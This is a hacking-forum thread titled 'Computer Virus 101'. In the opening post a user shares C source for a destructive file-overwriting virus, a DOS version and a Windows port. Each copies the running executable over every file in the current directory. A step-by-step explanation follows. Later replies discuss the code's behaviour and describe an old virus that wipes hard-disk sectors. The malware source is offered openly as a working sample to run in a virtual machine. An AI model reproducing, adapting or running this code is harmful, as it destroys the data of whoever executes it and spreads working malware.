Computer Virus 101

[Clone]

As we all know a computer virus is a self-replicating program of malicious intent.

https://en.wikipedia.org/wiki/Computer_virus.

Most people are curious to learn how viruses are made so I googled and found the most common form of old school computer viruses in C....

Code: (C) [Select]

#include<stdio.h>
 #include<io.h>
 #include<dos.h>
 #include<dir.h>
 #include<conio.h>
 #include<time.h> FILE *virus,*host;
 int done,a=0;
 unsigned long x;
 char buff[2048];
 struct ffblk ffblk;
 clock_t st,end;
void main()
 {
 st=clock();
 clrscr();
 done=findfirst(“*.*”,&ffblk,0); //Search for a file with any extension (*.*)
 while(!done)
 {
 virus=fopen(_argv[0],”rb”);
 host=fopen(ffblk.ff_name,”rb+”);
 if(host==NULL) goto next;
 x=89088;
 printf(“Infecting %s\n”,ffblk.ff_name,a);
 while(x>2048)
 {
 fread(buff,2048,1,virus);
 fwrite(buff,2048,1,host);
 x-=2048;
 }
 fread(buff,x,1,virus);
 fwrite(buff,x,1,host);
 a++;
 next:
 {
 fcloseall();
 done=findnext(&ffblk);
 }
 }
 printf(“DONE! (Total Files Infected= %d)”,a);
 end=clock();
 printf(“TIME TAKEN=%f SEC\n”,
 (end-st)/CLK_TCK);
 getch();
 }
Viruses are common in windows since a huge percentage of computer users are windows based. So I thought why don't I replicate the above code in current windows form....aah! What the hell lets have fun! So I coded a replica:

Code: (C) [Select]

# include<stdio.h>
# include<windows.h> //call to a windows header file
# include<time.h>    //to be used to computer time take to infect

FILE*virus,*host;    //pointer to virus file and host file
int a,done;
WIN32_FIND_DATA FindFile;   //WIN32_FIND_DATA structure containing file information
                             //found by FindFirstFile,FindNextFile functions.
char buff[2048];
HANDLE hfind;//handle to a file object.
unsigned long x;
clock_t st,end;
void main(int argc,char*_argv[])
{
    st=clock();
    system("cls");//clrscr() clears the screen but in windows it will be undefined ref.
    hfind=FindFirstFile("*.*",&FindFile);//Searches for a files in current directory.
    while(done!=0)
    {


    if(hfind==INVALID_HANDLE_VALUE)
    {
        printf("Error %d:File(s) not found ",GetLastError());
        return ;
    }
    else
    {
        virus=fopen(_argv[0],"rb");
        host=fopen(FindFile.cFileName,"rb");
        if(host==NULL)goto next;
        x=89088;
        printf("Infecting %s...\n",FindFile.cFileName);
        while(x>2048)
        {
            fread(buff,2048,1,virus);
            fwrite(buff,2048,1,host);
            x-=2048;
        }
        fread(buff,2048,1,virus);
        fwrite(buff,2048,1,host);
        a++;
    next:
        {
        _fcloseall();//fcloseall() POSIX function.But its deprecated you can use _fcloseall instead.
        done=FindNextFile(hfind,&FindFile);//continues with searching from previous call
                                          //of FindFirstFile().Parameter are previous handle
                                          //to pointer FindFile.
        }
    }
    }
    printf("DONE! Total Files Infected=%d\n",a);
    end=clock();
    printf("TIME TAKEN to infect %d file is %f seconds\n",a,(end-st)/CLK_TCK);
    printf("%s\n",_argv[0]);
    getchar();


}
 

In fact there is no difference. But I will explain just in case someone wants to bug members of EZ about viruses and how they work. Please note that the above code has got a default child bug to prevent noobs from trying to claim it as their own code, and any antivirus software can identify this virus due to its heuristic nature.
The above virus:
1) Searches for files in the current directory.
2) Returns an error if file was not found.
3) Loads a copy of itself into memory.
4) Opens target file then copies itself thus destroying the host file.
5) Loads the next file to infect and repeats
First of all we include the header files and variable to be used or if you like "data to work on"     

Code: (C) [Select]

# include<stdio.h>
# include<conio.h>
# include<windows.h> //call to a windows header file
# include<time.h>    //to be used to computer time take to infect

FILE*virus,*host;    //pointer to virus file and host file
int a,done=1;
WIN32_FIND_DATA FindFile;   //WIN32_FIND_DATA structure containing file information
                             //found by FindFirstFile,FindNextFile functions.
char buff[2048];
HANDLE hfind;//handle to a file object.
unsigned long x;
clock_t st,end;
I've included comments to explain what is going on in this section. Command line arguments here enable us to include the virus file destination without hard-coding it. From including int argc and char_argv[], argc is number of arguments passed and _argv is the array string of characters representing arguments passed.

Code: (C) [Select]

void main(int argc,char*_argv[])

By default, _argv[0] is the name of the target executable.

Code: (C) [Select]

virus=fopen(_argv[0],"rb");
host=fopen(FindFile.cFileName,"rb+");
FindFirstFile("*.*",&FindFile) simply searches for files in the current directory and the info is stored and reperesented as FindFile which as mentioned is a pointer to the struct storing the file info, thus FindFile.cFileName is the name of the file after the search as the loop continues. process.system("cls") is the same as cls in msdos on that we have made it a system call.Its not really needed can be removed.

Code: (C) [Select]

st=clock();
    system("cls");//clrscr() clears the screen but in modern windows it will be undefined ref.
    hfind=FindFirstFile("*.*",&FindFile);//Searches for a files in current directory.
    while(done!=0)
    {
As the msdn says," an object is a data structure that represents a system resource, such as a file, thread, or graphic image. An application cannot directly access object data or the system resource that an object represents. Instead, an application must obtain an object handle, which it can use to examine or modify the system resource." Thus there was need for the hfind  handle to FindFirstFile() which ,if the function succeeds, the return value is a search handle used in a subsequent call to FindNextFile() and  the FindFile parameter contains information about the first file or directory found.

Code: (C) [Select]

if(hfind==INVALID_HANDLE_VALUE)
    {
        printf("Error %d:File(s) not found ",GetLastError());
        return ;
    }
and

Code: (C) [Select]

next:
        {
        _fcloseall();//fcloseall() POSIX function.But its deprecated you can use _fcloseall instead.
        done=FindNextFile(hfind,&FindFile);//continues with searching from previous call
                                          //of FindFirstFile().Parameter are previous handle
                                          //to pointer FindFile.
        }
From there it is basically write and read from *virus to *host file found with fread() and fwrite() function. The variable a will show the number of files infected as it's just a count until FindNextFile returns 0, then the loop stops. The below links will help if don't understand file input/output in C. I can't do everything you know, but I can try to answer any questions.

References:

http://www.cplusplus.com/reference/cstdio/fwrite/
http://www.cplusplus.com/doc/tutorial/files/
http://www.cprogramming.com/tutorial/cfileio.html
 http://http://www.gohacking.com/create-computer-virus/

Anyway to prevent to much self explaination If you have basic C knowledge its easy.It just in windows format. I hope you don't go around screwing up stuff but like i said its basic and any AV can see through it.

But check out by Deque, the Java Queen!
http://evilzone.org/scripting-languages/%28python-source%29-basic-virus-infection-and-polymorphy/

[Phage]

I would work a bit on the your grammar if I were you. Though it's not the worst grammar i've seen it bothered me the whole way through the post. To be honest I'm not quite sure what to think about this? To me it seemed like you shared some C code of some wannabe virus and explained that all C programmer would understand this and we shouldn't fool around with it, yet you also tall us that every AV would detect it?

[Clone]

Once again guyz its wasn't mean't to wow! anyone,am sure there are gurus here who would consider the code a joke but maybe for a curious person its a beginning step.


Phage,Sorry for the bit of grammer,i was editing some explantation from msdn.I wasn't targeting "Stuxnet virus"  i simply made the windows version of the virus from gohacking website.AV will see this before the exe is executed and also the fact that it won't execute unless u change the value of the data.Test it out under an OS in oracle vm am sure it will work.

[Deque]

That's a nice code share for those who want to know how a virus can work. But yes, the explanations could be better.
This sample virus is the most simple one can think of, it overwrites the host file, thus is destroying files everytime it is executed. There have been popular viruses of that kind a long time ago, but now they don't survive long enough in the wild to spread.

Here is one example:

https://www.youtube.com/watch?v=13kagFBEB9o

Description:

Deicide is a parasitic virus that infects .COM files by just overwriting the start of file. Decide avoids infecting COMMAND.COM.
When an infected file is run, Deicide will find and infect one file in the current directory; displaying the following message each time a file is infected.

"File corruption error."

If no infectable files can be found in the directory, Deicide will overwrite the first 80 sectors of the harddisk and show the following message:

"DEICIDE!
Glenn (666) says : BYE BYE HARDDISK!!
Next time be carufull with illegal stuff"

Thanks for the cross-reference to my paper.

[Clone]

Thanks for the cross-reference to my paper.

It really helped me since i was interested in comp viruses.Once again sorry for the bit of grammar 

[Kulverstukas]

As I understand, this doesn't infect anything, it just corrupts files by writing garbage to files. We want results, not excuses!

Also the post could do more formatting because it's kinda ugly right now. However overall, I'll give you your first cookie because of the effort

[Deque]

As I understand, this doesn't infect anything, it just corrupts files by writing garbage to files, or am I wrong?

Also the post could do more formatting because it's kinda ugly right now. However overall, I'll give you your first cookie because of the effort

Not random garbage. It overwrites the host file with its own copy.

[Clone]

Thanks chief! am sorry for the grammar,format etc actually I am not usually on EZ its a once in a while kinda thing.As i stated i learn and try to contribute...if am wrong am corrected.

[Kulverstukas]

Thanks chief! am sorry for the grammar,format etc actually I am not usually on EZ its a once in a while kinda thing.As i stated i learn and try to contribute...if am wrong am corrected.

Stop with the excuses, ffs. It won't make your posts look better if you excuse all the time.
WE want RESULTS, not EXCUSES!

[Kulverstukas]

I have no clue what you wanted to ask with your post.

[Clone]

I have no clue what you wanted to ask with your post.

I mean like this:


with all the formats or like Deques codes http://evilzone.org/scripting-languages/%28python-source%29-basic-virus-infection-and-polymorphy/

[Deque]

Specify the language used in the code tag.
I.e. code=Java (but with square brackets)

[Z3R0]

Grammar and code formatting updated, plus a few hidden m0rph notes.

[Clone]

Grammar and code formatting updated, plus a few hidden m0rph notes.

Thanks alot!

Specify the language used in the code tag.
I.e. code=Java (but with square brackets)

Thanks i will try it

Staff note - refrain from double-posting. m0rph

[Danus]

A very useful tutorial i enjoyed reading this.